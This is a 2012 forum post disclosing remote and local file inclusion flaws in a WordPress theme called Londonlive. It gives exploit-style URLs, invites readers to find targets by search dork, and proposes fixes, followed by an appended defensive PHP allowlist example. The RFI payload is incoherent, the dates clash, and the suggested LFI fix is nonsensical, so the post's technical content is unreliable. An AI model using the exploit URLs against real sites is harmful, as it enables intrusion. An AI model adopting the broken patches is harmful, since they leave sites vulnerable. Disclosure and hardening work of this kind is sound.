Ace
05-15-2012, 04:06 AM
Peace be upon you, and the mercy and blessings of God :-
How are you guys, I hope you are well :redface:
I discovered an RFI & LFI vulnerability in the Arabized WordPress theme Londonlive. Here is the vulnerability along with the patch:
# Exploit Title: Wordpress themes (Londonlive)====> RFI & LFI
# Google Dork: you do it :P
# Date: 2012/5/31
# Author: ACe
# Version: v1.2
# Tested on: win 7
# email:[email protected]
# greetings to : pSyCh0_3D , Fontom
#RFI exploit#
http://localhost/wp-content/themes/Londonlive/functions.php?local_file= wget eval
#LFI exploit#
http://localhost/wp-content/themes/Londonlive/scripts/functions/admin_panel_functions.php?page.=../index
#how to fix LFI exploit #
search for ($page.) and replace with ('../../..';) in /scripts/functions/admin_panel_functions.php then save.
#how to fix RFI exploit #
go to /themes/Londonlive/ and open functions.php and define the variable ($local_file) like this
$local_file="./";
#thanks God for making me stronger :)
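
A defensive pattern for the two fixes described in the post above, written as an added example (not the Londonlive theme's code and not the poster's patch): block direct requests to a theme file, initialise the include base before use, and map a request-supplied page key through an allowlist instead of building a path from it. The `PANEL_PAGES` entries, the `panel` directory, the `page` key and `resolve_panel_page()` are hypothetical names; the theme's actual source is not shown on this page.

```php
<?php
// Added example with hypothetical names; the theme's real code is not on this page.

// WordPress defines ABSPATH when it loads; refuse direct requests to this file.
if (!defined('ABSPATH')) {
    http_response_code(403);
    exit;
}

// Initialise before use so the value is never taken from the request
// (an uninitialised variable is request-controllable where register_globals is on).
$local_file = __DIR__ . '/';

// Hypothetical allowlist: request key => file inside the panel directory.
const PANEL_PAGES = [
    'general' => 'general.php',
    'layout'  => 'layout.php',
];

// Resolve a request-supplied page key to an absolute path, or null if rejected.
function resolve_panel_page(string $key, string $baseDir): ?string
{
    if (!isset(PANEL_PAGES[$key])) {
        return null; // unknown key: traversal strings and URLs are rejected here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PANEL_PAGES[$key]);
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // Defence in depth: the resolved path must still sit under the base directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$key  = isset($_GET['page']) && is_string($_GET['page']) ? $_GET['page'] : '';
$file = resolve_panel_page($key, $local_file . 'panel');

if ($file === null) {
    http_response_code(404);
    exit;
}
include $file;
```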